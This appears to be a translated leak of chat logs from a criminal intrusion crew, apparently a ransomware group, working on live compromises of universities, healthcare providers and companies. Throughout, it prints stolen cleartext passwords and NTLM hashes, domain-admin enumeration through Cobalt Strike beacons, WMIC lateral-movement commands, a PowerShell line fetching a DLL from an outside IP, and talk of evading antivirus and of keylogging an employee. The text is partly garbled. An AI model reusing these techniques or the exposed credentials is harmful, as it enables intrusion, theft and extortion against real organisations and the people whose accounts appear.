on vsFTPd only vsftpd_234_backdoor didn't work with 2.2.2 on SMTP not quite figured out with enum, there user_file is taken from local machine, but why it is taken - is not clear, in idea it must deduce users, which rotate there, and not check with entered by me, no? smtp_ntlm_domain just works without output for relay session in the msf need, but how to drop it there - no idea, 445 open, but the same dir says type network name not found On webmords interesting found Avaya, tried knocking there with nddevbernst codes - did not work, with those above, from webroot - stood for about 20 minutes and I turned it off, so it did not show anything It won't let me into the ciski, it just won't load. [+] 10.51.128.199:445 - 10.51.128.199:445 - Success: 'JDOSSN\nddevbernst:Tractor20! `` * Username : nddevbernst * Domain : JDOSSN * NTLM : 5b622ad5d550408ed6260c2b8fb185cc Result: Tractor20!>sAMAccountName: nddevkodell ``` >memberOf: CN=NDLEADING_ISG,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_SALES,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_EQUIPRDB-SALES-RENTAL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local ``Kevin O'Dell d33r31 !Well deactivated ) ``` User name svc_BuildAutomator Full Name EQBuildAutomator Comment User's comment Country/region code 000 (System Default) Account active No Account expires Never Password last set 10/20/2020 9:13:16 PM Password expires Never Password 
changeable 10/21/2020 9:13:16 PM ``and on those who ``were'' as well. User name svc_snow_preprod Full Name Service Now PreProd Comment Service Now Preprod User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/19/2020 7:38:46 AM ``YeahPassword last set 10/21/2020 4:26:58 AM They probably got wind of it a couple days ago they changed the passwords and removed most of the danes didn't fit the passwords that were in the beginning try to these accounts I built in the beginning`` beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain jdossn.local. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- DHSAdmin jdodmp_svc The command completed successfully. ``It gave me a different result, it's strange`` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- a900221 AuditDB_svc AuditJDOSSNDA DHSAdmin jdodmp_svc MPXAXDAgentAccount PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom svc_audit svc_BuildAutomator svc_exchange svc_OMAA svc_OMDAS svc_OMREAD svc_scomsql_2019 svc_snow_preprod The command completed successfully. 
UserName : jdodmp_svc ComputerName : JDODC67.jdossn.local SessionFrom : 204.54.154.136 SessionFromName : JDODMP03.jdossn.local LocalAdmin : False Well, the two domains admins)))) but fucking there are two:D so they took it, I say not ask for it the password was set by some network admin it's LA passwords now we'll check it on all domains admins sure sure) ok yes Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee::: ``didn't understand the question I was admin sure is it worth it? try jeremstew@gmx.com 1Qwerty1:::seclold I'm now with my card or you have an account without balance? there Purchase button should be there are credits on the accountpurchasevoneaFound.But this is a payment record. Purchase Get free credits on all? no one has been disconnected? Please wait up to 5 days. A notification email will be sent to youProst how many I've been there - always no luck):man_shrugging: )and why not check ?there by the way their passwords that are in hashes on kmd5 do not work? it's unlikely domain pass... but you could try it. https://www.gotomeeting.com/meeting/sign-in Presenter Login: blainee@leadingedgeequip.com Password: NDleading2020$ ``no see liku look in citrix 2fatam 2faon there's an admin? o_o where is that from? ``` --- Chromium Credential (User: ndmicjsater) --- URL : https://my.webrootanywhere.com/default.aspx Username : jasons@leadingedgeequip.com Password : jsateren8726 ``and cisco netswich did open)``and cisco opens on https? https://10.51.128.5 Cisco ASDM 7.1(2)ugh the fucking cloud karocha on it netapp is vindanas? 
ah, well where it LA there `>operatingSystem: NetApp Release 8.3.2P7 `` I'll look it up straight "it" Well, I wrote above that there are on the servers LA, but he does not see the fs why then and that mmm for cars for between the chair and the monitor an empty coconut hangs on-call-aspects because they for techportaok, will dotakaya acke on the servers almost never rbaotayuta not on the servers?to the servers, all - and this is what they brute-force available hosts from other segments? but i doubt that someone outside this segment(hmDa like yes, HP kinda lets in on the proxei switches are all mfu's? I don't know the models by eye so) MFPs? 10.51.128.171 WORKGROUP\HPFEA60E [Win] 10.51.128.149 00-00-00-00-00 WORKGROUP\HPC67872 [Win] 10.51.128.122 00-80-91-CE-12-74 MFP13505140 [Win] 10.51.128.82 FC-3F-DB-4D-76-CB NPI4D76CB [Win?] 10.51.128.84 44-1E-A1-33-BA-C1 NPI33BAC1 [Win?] do these hosts say anything? on the workgroups try the local admin they have here on the network You can also try to use your users... if it will start though unlikely some unknown cisco10.51.128.5 7C-69-F6-E6-2D-C1 [SSH-1.99-Cisco-1.25]you can set on brute force if lockout will not directly hydra under sockets on webforumtry webs on the switch admin/admin admin/password i used a similar garbage and it didn't work for me) do you use this palm? https://github.com/k8gege/Ladon they create the domains I guess... 
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] 10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] ``` switches...`` 10.51.128.83 [NPIF68328] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401dne 10.51.128.83] 10.51.128.84 [NPI33BAC1] [Virata-EmWeb/R6_2_1] [HP LaserJet P2055dn 10.51.128.84] 10.51.128.3 [ ] [Gateway] [AT&T VPN Gateway] 10.51.128.10 [ ] [] [] [+] received output: 10.51.128.62 [ ] [Embedthis-Appweb/3.4.2] [] 10.51.128.61 [ ] [HTTPD] [Web managerment Home] 10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] 10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] [+] received output: 10.51.128.144 [DESKTOP-CGJQ23A.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401n 10.51.128.144] 10.51.128.122 [MFP13505140] [Apache] [TopAccess--> ``but before it dies:``doesn't say anything-what do you mean by exporting? Backup is disabled is it sad that they didn't get it up? although it's more about the AV base something from Fortinet ``` SerialNumber=FPT-FCS-DELL0000|Address=173.243.138.108:443|FDNListener=|TimeZone=0|AddrIPv6= SerialNumber=FPT-FCS-DELL0008|Address=173.243.138.98:443|FDNListener=|TimeZone=-5|AddrIPv6= SerialNumber=FPT-FCS-DELL0009|Address=173.243.138.99:443|FDNListener=|TimeZone=-8|AddrIPv6= SerialNumber=FPT-FCS-DELL0010|Address=96.45.33.105:443|FDNListener=|TimeZone=-5|AddrIPv6= SerialNumber=FPT-FCS-DELL0011|Address=96.45.33.106:443|FDNListener=|TimeZone=-5|AddrIPv6= ``Waiting for data ``Powerpick Invoke-Inveigh -Kerberos -FileOutput Y "C:\Users\mercedesd\AppData\Local\Microsoft\eula.txt"``Well, most likely his domain already known creeds can safely connect to VPN and see the domain 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd 3144 4772 FortiWF.exe x64 0 NT AUTHORITY\SYSTEM 1424 4772 FortiProxy.exe x64 0 NT AUTHORITY\SYSTEM `` 1424 4772 FortiProxy.exe 3144 4772 FortiWF.exe 6412 4772 FCDBLog.exe 6428 4772 fcappdb.exe 7100 4772 
FortiESNAC.exe 7108 4772 FortiSSLVPNdaemon.exe 7116 4772 FortiSettings.exe 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd 11900 4772 fortifws.exe 18236 4772 fmon.exe beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain matches.com. System error 1355 has occurred. The specified domain either does not exist or could not be contacted. ``Session returned http://docs.fortinet.com/document/forticlient/6.0.0/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windows https://kb.fortinet.com/kb/documentLink.do?externalID=FD44157 https://kb.fortinet.com/kb/documentLink.do?externalID=FD48788 which leads to the domain``` Description . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30) ``` you can search for fortikgat config of the VPN `` TCP 192.168.0.17:65182 SkyRouter:5431 ``sessions are not present - VPN is probably switched off so you can see the domain if you get the output from the "domain admins" /dom check that the domain is visible Machine is not part of domain - exit. ``From the system. ``` beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Machine is not part of domain - exit. ``` From user ``` beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \\MATCHES.COM\sysvol\MATCHES.COM\policies\. [-] Invoke_3 on EntryPoint failed. Did you check if the domain is visible at all? Maybe there's a VPN disconnected from the domain )-Lists DK, yes? 
`` beacon> execute-assembly SharpView.exe Get-Domain [*] Tasked beacon to run .NET program: SharpView.exe Get-Domain [+] host called home, sent: 841791 bytes [+] received output: An error occurred: 'System.IndexOutOfRangeException: Index was outside the bounds of the array. at SharpView.Program.Run(String[] args) at SharpView.Program.Main(String[] args)' ``it didn't work you forgot to put adfind here, please, for the sake of argument) you can poke the formatting in #general as an example ``Target : outlook.office365.com Comment : SspiPfc UserName : Mercedes.Dinhamgrant@matchesfashion.com Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 13/03/2020 12:22:01 Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com UserName : Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 08/09/2020 16:02:18` ``` Target : outlook.office365.com Comment : SspiPfc UserName : Mercedes.Dinhamgrant@matchesfashion.com Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 13/03/2020 12:22:01 Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com UserName : Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 08/09/2020 16:02:18 There's also a one-line formatting like ``marker``@user1 tell me how to format please the rest of usSo, drop in here the information you gathered, passwords found, ad info, sitbelt, and so on and continue 
work)eyJhbGciOiJB/360fJkwH4TQ6LODerkkb4TlbN0v/Zt5aK/BgoHABZb9CbTBU3YnjStc++ipt5xVxC+bbWj9EfCyMO1Z5+fFCt0TfdobT1dxN5hHr0SDk4Rv7YC7Ec2pFnt2aJsnJe9qk1T94PiNEQlmEAdKnkZq7glGAwZJeKgPCC7wLVY7OcU7+1Yn8ImX9o1DFMTAlVNwbhEgqNqQXaLOSn9/wpqySw==eyJhbGciOiJBxX2bvj2LLTDwhlBvieTlwrBkhX8ngIKIjBaetx8b1L/oWGkAX4QsbLWvPMO41Aw2FSqiJDsRumji0Vmlft5Jgu7mg/OQFau3h9PfdTZ4Z3bIrwbEKOouwr/RPgBVkFcdVrJoHJfebtGcRDUERbP0xYY5h1On7UYvrZzCUgWoYun0y7Hfd4vL7IbhDeP4h1yCRtyr+PJdF50UpZHPyJ4MCqYcUR9FiLMdZKXlS5eLx/vjVtpsGmwsbwJr13y/zpJGhVES0NyQoufK0lHF2X3riZXCeJLUYPnOOloPTv29n09YaPK6AuyehhCps925u7+mguikxaAxoyu99/BgirSOn60Ib73IHmpqNRFCnaMZZdw=eyJhbGciOiJBhFASKtrWS+mJFYNHEP7Z180TrNSuIruXJJ3m95kV4Z427KwnBGG5q44CwZZPMbh4hlnOHWuS8YF6xNGlxux9dwzxxqafgfvGCw8ycjgVNBVz5rf3tOtMJDjKOnNlQ1I7xxU3vBkHaW28kfkexpo0T9pKy8kN2AA088uri1tP84o=eyJhbGciOiJBu2oE1WMxl3Y59WYGluxRGl7vvKhmiwcAQgbXMj4+dYTHX2EgtD8Demco+OMkNmtVcLSrQjjE5LgyuIbtMhjV9JgKVqfFHeGJ+ixD3JlwPOstgei1xUltazxNKJNlYJUVIyhjSlZ8nvP08+xulm+mbrp9nmYM8pEeCUmE92t3/VU=otuser8tl2eyJhbGciOiJBI4OZkrnV7D96S EA's creeds are found, attempts are being made to sneak into the trusts to continue work10.10.30.24 what is Z? C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$ ""WH20s.admin 1225kofq"" /user:lrhc.local\svc-aadc > C:\ProgramData\nts.txt && copy C:\ProgramData\nts.txt \\10.10.30.24\C$\ProgramData\nts.txt" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 3428; ReturnValue = 0; }; C:\Users\wevvewe\Desktop>dir Z:\ProgramData\nts.txt Volume in drive Z has no label. Volume Serial Number is 584E-4F0A Directory of Z:\ProgramData 12/15/2020 12:48 PM 0 nts.txt 1 File(s) 0 bytes 0 Dir(s) 4,098,580,480 bytes free Can't you do a no-jouz with a direct quote and output it to a file so you don't have to do magic? 
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use > C:\ProgramData\eula_en.txt && copy C:\ProgramData\eula_un.txt \\10.10.30.24\C$\ProgramData\eula_en.txt" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 5588; ReturnValue = 0; }; ``` ``` C:\Users\wevvewe\Desktop>type Z:\ProgramData\eula_en.txt New connections will be remembered. There are no entries in the list. `````` C:\Users\wevvewe\Desktop>wmic /node:10. 10.30. 24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 7036; ReturnValue = 0; }; ``Then password)[ ](https://mediaeveryone.com/group/lrhc-org?msg=mb5ncYh6KZCcgbf4a) will it be like this? Write the ip like this ``10. 10.30. 24"} C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc"/password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$" ERROR: Description = Access is denied. ``He gave me different commands with quotes, take the username polzakastop C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user:lrhc.local\svc-aadc /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$" ``I don't know my name is ``wanga''? Invalid Global Switch. Try the second one from the internal car with wmik and it's the same problem I had a problem with trust, it's not a problem at all, I thought maybe the output was wrong, it's a password with a space, compare it with a space))) it's not clear if it's with a space or what Username Domain Password -------- ------ -------- svc-aadc lrhc.local WH20s.admin 1225kofq ``` it's fucking stinky not found so fuckin' send me the hash and I'll give you the clearance. 
all right, to see the clearance you have to buy the check for free. now it's no fun who was logged in. we all got kicked out of the account so you changed your usernames and passwords. write 5.com how do I check hash from kmd? it's like 0...I would dal no yuz check it out can you give me a file with cleartexts from ntds? I want to check I do not understand what you're doing) this hash will eat? https://github.com/InfosecMatter/Minimalistic-offensive-security-tools/blob/master/smblogin.ps1 yeah and how to download the hashes without a coba?) and stop shahesh what exactly do you want to download? so you downloaded? here they are EA with hashes of all collected and accidentally sent i threw the name + hash EA and did not understand what you threw) it's not all shaobl``` lrhc.org\PsService 327db612d1d53ac8477a49ae667d523c lrhc.org\Pssupport01 8c3c72c186ece567004a620aff55d842 lrhc.org\svc-aadc a5ed4977ab742434bd35761f3cb4c028 lrhc.org\TMSXE.Service01 a6aea38d860ac5c1e980a7724bd0362e lrhc.org\UCAdmin 1c7c0878a380b6e004f97cd62af6398b lrhc.org\frsecure 6888441821d91affeb5f8cad8a6cad7b lrhc.org\Psupport 8c3c72c186ece567004a620aff55d842 lrhc.org\tms01 a6aea38d860ac5c1e980a7724bd0362e lrhc.org\jyrkwa ce52742a372f62d7100e9ca7b5f13369 ``If you find the hash, I'll give you the clearance pass from EA? 
```
dn:CN=ffmg.local,CN=System,DC=lrhc,DC=local
>whenCreated: 2010/01/18-12:49:34 Central Standard Time
>name: ffmg.local
>securityIdentifier: S-1-5-21-111134195-3807604873-3122732003
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ffmg.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=mcklrh.mig,CN=System,DC=lrhc,DC=local
>whenCreated: 2018/02/14-17:38:43 Central Standard Time
>name: mcklrh.mig
>securityIdentifier: S-1-5-21-2653265968-1271411615-963851744
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: mcklrh.mig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ELEAH.LOCAL,CN=System,DC=lrhc,DC=local
>whenCreated: 2020/09/16-17:04:40 Central Standard Time
>name: ELEAH.LOCAL
>securityIdentifier: S-1-5-21-2327498286-4212857632-543316630
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ELEAH.LOCAL
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
```
There are 3 trusts, 1 in quarantine, I don't touch it, it turns out?
```
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 90
Minimum password length: 8
Length of password history maintained: 10
Lockout threshold: 10
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
```
Please write to the confines of the progress + new session in the input coba, by the requests of those waiting for the session
Access to the admin + there look for admin in the AV?
What is in the work now?
Good afternoon
Morning at the hut. will be finished today
you already copied messages?)
you only build order)))
but good night, until tomorrow
until tomorrow
we will close sysdak even to 6 most likely
will be delayed until 2-3 am
tomorrow by 5, in general, that's how it is
okay, if no interference from AV
describe what you did on the result, it is lazy)
you stopped at kerb
haven't tried any of this, I will try to see, and what passes to try?
i have a list of only 4 sql, zero, smbghost?
i have tried on all cars to raise the rights, nowhere succeeded, under this type of creds do not knock anywhere else, and the other polzak only in hashes rubus, still waiting for them
on all labs, ie you have where to go?
all in confed
aad and other things are there?
if the kerb is unbroken, then you can further unwind
there are places to work?
on all machines (virtual labs) authorized under it (some sessions have hung, if you need to restore them)
there do not rise
all elevate in the cob tried
is there where to dig?
#humboldt-edu is the one where the user can only go to the virtual labs, AB there vindef
remains in your work, then through tpsh you can remove hell and kerbs and other
and it killed it after loading?
I went to rdp, ran kmd, in it ran your one-time command, went to tpsh, figured out the interface, wanted a dll in cobalt, ran the attached string and got no response
I didn't get it off. Didn't get a response from AB. Didn't have time to try anything at all
The session in tpsh just died
```
(New-Object System.Net.WebClient).DownloadFile('http://199.127.61.166:8080/A3z4km1/x64.dll', 'C:\Users\Healdton.IT\x64.dll')
```
Minute
@user7 av which?
stop, this other one can't pull anywhere, AV breaks everything, user not LA
but with a different way of loading?
https://vlab.humboldt.edu/rdweb/webclient/
@user7 here we have what?
flew, after a short time - flew away
tpsh comes and goes?
by stg?
yes, marked the second one you gave - the kreds did not fit in tpsh
this was
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx
is this one in your work? are the accesses working?
so i need to re-save it
@user8 then you still have work to do with it
that's all i did outside the domain, i didn't pull it
i wanted a dll in cobalt, ran the download in tpsh and no response
did you pull the kerb?
not working on it yet, i can't see what else can be done with it
work with ttps://lab.devry.edu/vpn/index.html
have you got it working?
only 1 subnet is visible, there polzaki
@user8 there are 2 questions to you by the story
vectors were not identified?
have you tried different software dll load?
i worked with the first one less than 10 minutes
on the dedik under vpn no cracks. Checked the network at ms17\bluekeep\smbghost and nothing. the last option was to find a dc and outside the domain to put a zerologon, but dc I have not found
what?
do not know
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx
@user8 what do we have here?
https://vpn.floridapoly.edu
also a question for you, what's up with you?
okay, you wrote off her status, she's in the works
I'm up to my neck in it
It's only possible to work with her through msf
even if i somehow miraculously get up to yes, then i do not know what to do at the stage of crypto)
you have a working network?
@user9 nothing other than windef?
another thing
https://ra.vdi.stevens.edu/vpn/index.html
no way to upload the load (coba/msf). Neither as an exe nor as a dll. I've uploaded via powershell and chrome. Everything chops vindef (notifications pop up)
without a step aside
write status on this grid
no, jump the topic)
not a word about it
so we are not about sisd
bitdef in sisd.pet
a bitdef where?
here only vindef but evil as hell - kills everything at the download stage, or launch in case of psh
it chops cob, msf, psh dlls?
@user4 you have a bitdef from the point of entry
one by one, you've confused me)
and in the last one only vindef, well I have BitDefender
well, apparently
go ahead
@user4 mcafee, and you?
everywhere mcafee
which av?
through msf dll can try to put there
ah yes, here tpsh does not work, I do not think it will work there either
if you throw through psexec command load in tpsh?
tried windows/smb/psexec with these creds, the session dies
So if there is a pass to the other PCs, why did not go there?
no, the list and a third of the list did not pass)
tried windows/smb/psexec with these creds, the session dies, and the admins (LA\DA\EA)
i.e. hash, yes?
has hash LA, fits to several computers
what's there to brute-force?
nothing but mcafee? it's like they have some kind of iron that filters traffic...
mcafee
similarly
what av?
dies right away
psh?
have a system, session in msf, i can't get a session in both coba and armia (different ports, payloads), in armia dies right away and will not reach coba
hash LA, fits to several computers, but the session dies when brute force (goes through a list of 40 pieces), proxy msf somewhat unstable (rotate, more precisely) took off
yes, and admins (LA\DA\EA)
dll coba, dll msf. chopped at the stage of downloading
all - what?
all chopped by vindef
http://ra.vdi.stevens.edu/vpn/index.html @user4 what's up?
ready
@user9 https://lab.devry.edu/vpn/index.html what do we have here?
and in order: clean the sessions and in slip, we finish, then half an hour a little meeting and summarize the results of the week, another half hour
To what time today?
to the coba not at all, in the arma immediately fall off, different load ports and so on... i'm busy with mine, i'm trying to get somewhere from msf, i tried both coba and arma to throw a session - does not come in any way
No software, i left on the forum so far only guides for gui
looking for how to chop up bitdefender
a lot of you without a job?
Who are you asking?
Are you still sitting idle?
Well, the first domain (`tcph.stg-healthcare.com`) in tpsh fell off, the second (`signature-healthcare.org`) - citrix cred is not true
so how are you doing there?
if no one's writing anything like that, I won't even write about it here + your colleagues might have written it down - I won't repeat it to you - I already wrote it down, I'll go ask him
google second domain
@user8 https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx
?
where's the psh history file?
ok
zamenapz, or can i help someone?
ok
for now, postponement)
it's a one time thing
i want a nickname, too?
Why is it the one you threw me off the
punks hoyrebytes give a one-time load
the same command?
try tpsh
mmhom
the alerts popped up that the dll worked successfully
what is the sonar?
and kmd access, fucking danila, i can't get it in the kobe either, so i don't use the load, so it's always dirty
dacobs?
beacon in powershell format?
well, the one my colleagues tell me about :confused:
i'm scared to ask what psh?
hz, in sisd dll blocked and psh works out
if the psh load was fud why do we all dll updateable?
and a follow up question, so let your colleagues tell me about coba load in psh format) i'm already getting tired of repeating
powershell beacon
what load?
load, there is nothing but windef. and notifications pop up
what is windef blocking?
windef is blocking dll, cmd is disabled by admin
I take locham is not just using dll,
just for the record, the coba load in psh format has been stolen and not cleaned, and everything through powershell session to the coba,
why download something if it can download files? will it not be easier to download a file?
so why do you need to download a file in coba, in a minute through psh start downloading it in coba, or you can immediately prepare a file in tpsh
zagi look, what if it is empty now?
tsepvpvr
zablitet 3 pieces
https://ra.vdi.stevens.edu/vpn/index.html
https://remote.egr.msu.edu/rdweb/pages/en-us/login.aspx
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx
I think all 3 are free? Let's move on
ACADEMIC.NET no?
Took LA\DA\EA off, hell.
I got the system up, but I can't get it to work in the coba (80, 8080 ports with http listener) and I opened 443 port and no session will come in
History of my migration between domains
I opened a session with the rights `System`, opened the list of processes and logged in to the administrator, took a list of hosts on the other domain and through the command `shell dir \\[ip]\C$\Users` tried to determine where the DA was authorized, seeing that the list of directories is there, and filled dll through wmic run, at first (Friday) process runs but session did not come, today I tried again with re-crypted dll and session came, but then as usual hashdump + mimi and try to jump on the DC, all end, go away
update tulchanok, then work out
so in work now?
1
wait, have we all come?
i only change the names, logins will remain the old names
i think this moment has come
Yes
what was it? port?
and the network is also
user3 me - ttps://lab.devry.edu/vpn/index.html i tried to do it in the msf session (no coba), i will try to move on with the second half of the day, i will give more net
@user4 the first half of the day look for AV panel, search for technicians
@user9 more specifics
we have 3 networks in operation now, in the sisd.k12 no approaches found. and in sisd.net if you don't take into account avers - everything seems to be ready
Try new creds
Determine first what's done, what's being done, what's planned
What's the plan?
a, okey
hash here)
yes here it is, above. this is what Inveigh caught
the format what?
overnight let's leave the brute and Inveigh
brute-forced with passwords from luiza, ran Inveigh - something caught, but hashtag does not take.... sploits want password from sa. now it's brute force already with rockyou
brute whining and sploit?
yes, in general, everything is as it was.
how are things going here?
```
[*] 10.20.4.0/24:445 - Scanned 256 of 256 hosts (100% complete)
[*] 10.20.4.0/24:445 - Error: 10.20.4.34: RubySMB::Error::CommunicationError Read timeout expired when reading from the Socket (timeout=30)
```
I'll try DomainPasswordSpray to see if I can change something
can't the domain itself be polled?
yes, but we are not in the domain
It pings the local domain available and sends it LDAP requests once, as if you just register the domain
in smbautobrute it does not cling to this domain?
but domain users will not be collected
so we can also look towards python utilities
various times we have a context with the dedik, it is slow and does not collect domain users
if there is visibility on the smb - then the best option here is probably the smb_login module of metasploit
and we have a dedik not in the domain, and want to go through all networks of the domain with all domain users and the dictionary
why?
@tl2 Is there any password spray tool which can manually specify the address of the ldap server?
```
User1-1 beacon> shell nslookup matchesfashion.com
[*] Tasked beacon to run: nslookup matchesfashion.com
[+] host called home, sent: 58 bytes
[+] received output:
Non-authoritative answer:
Server:  UnKnown
Address:  fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0

Name:    matchesfashion.com.matches.com
Address:  204.74.99.100
```
FortiNet
```
User1-2 beacon> shell type setting.ini
[*] Tasked beacon to run: type setting.ini
[+] host called home, sent: 47 bytes
[+] received output:
[CONFIG]
CATEGORY=BROWSER;OFFICE;PDF;JAVA;MISC
[TRACK]
BROWSER=firefox.exe;chrome.exe;iexplore.exe;opera.exe;plugin-container.exe;opera_plugin_wrapper.exe;opera_plugin_wrapper_32.exe;FlashPlayerPlugin_*.exe
OFFICE=powerpnt.exe;winword.exe;excel.exe;EQNEDT32.exe
PDF=acrord32.exe;acrobat.exe;foxit reader.exe
JAVA=java.exe;javaw.exe;javaws.exe
MISC=helpctr.exe;hh.exe;wscript.exe;winhlp32.exe;loaddll.exe
[DANGEROUS]
BROWSER=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
OFFICE=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
PDF=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
JAVA=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
MISC=powershell.exe;net.exe;regsvr32.exe
[PROTECTION]
FLAGS=0
[REACTION]
MODE=0
[DESCRIPTIONS]
firefox.exe=Mozilla Firefox
chrome.exe=Google Chrome
iexplore.exe=Internet Explorer
opera.exe=Opera Internet Browser
plugin-container.exe=Plugin Container for Firefox
opera_plugin_wrapper.exe=Opera Internet Browser Plugin Wrapper
opera_plugin_wrapper_32.exe=Opera Internet Browser Plugin Wrapper (32 bit)
FlashPlayerPlugin_*.exe=Adobe Flash Player Plugin
powerpnt.exe=Microsoft PowerPoint
winword.exe=Microsoft Word
excel.exe=Microsoft Excel
acrord32.exe=Adobe Acrobat Reader
acrobat.exe=Adobe Acrobat
foxit reader.exe=Foxit Reader
java.exe=Java Platform SE
javaw.exe=Java Platform SE
javaws.exe=Java Web Start Launcher
helpctr.exe=Microsoft Help and Support Center
hh.exe=Microsoft HTML Help Executable
wscript.exe=Microsoft Windows Based Script Host
winhlp32.exe=Windows Help
loaddll.exe=LoadDll
cscript.exe=Microsoft Console Based Script Host
powershell.exe=Windows Powershell
net.exe=Windows Net Command
regsvr32.exe=Microsoft Register Server
cmd.exe=Windows Command Processor
dw20.exe=Microsoft Application Error Reporting
eqnedt32.exe=Microsoft Equation Editor
```
```
User1-2 beacon> shell net share
[*] Tasked beacon to run: net share
[+] host called home, sent: 40 bytes
[+] received output:

Share name   Resource                        Remark
-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\windows                      Remote Admin
The command completed successfully.
```
pinged sql-keys
```
AWS-VTBCSQL01.matches.com [10.7.19.25]
EC2AMAZ-U49LCLF.matches.com [10.1.4.4]
AWS-VTBIMSTRI03.matches.com [10.7.18.36]
```
OK. Then I suggest the following:
- try to connect it to the vpn
- gather from ad_comps the list of all the mssql servers and try the sa account
or try to solidify the dedik, it would be fun
and turn on the vpn at this point also, how do you connect?
well yesterday the keylogger showed that she went to netflix to watch
idletime
and for example by time, how do you determine?
so she didn't notice any abnormal activity. the important thing is to log in when she's not there. so the point is to log in to her pc under her access and enable yourself some vpn on some other machines.
did you try to connect to the dc?
did you try to get her in the remote dc group?
adfind did not work.
did you get it off with a turn-by-turn info?
did you get it off on all the dc's?
tried yesterday
tried
if she is asleep now you can go to her on the rdp and connect to the domain
can try it on
YES users with a limit on the number of attempts
did you get a dictionary for brute force in the process?
and brute what?
and her computer in the domain?
her pc is also not in the domain
as an option to try brute
no information on the connection console
6+
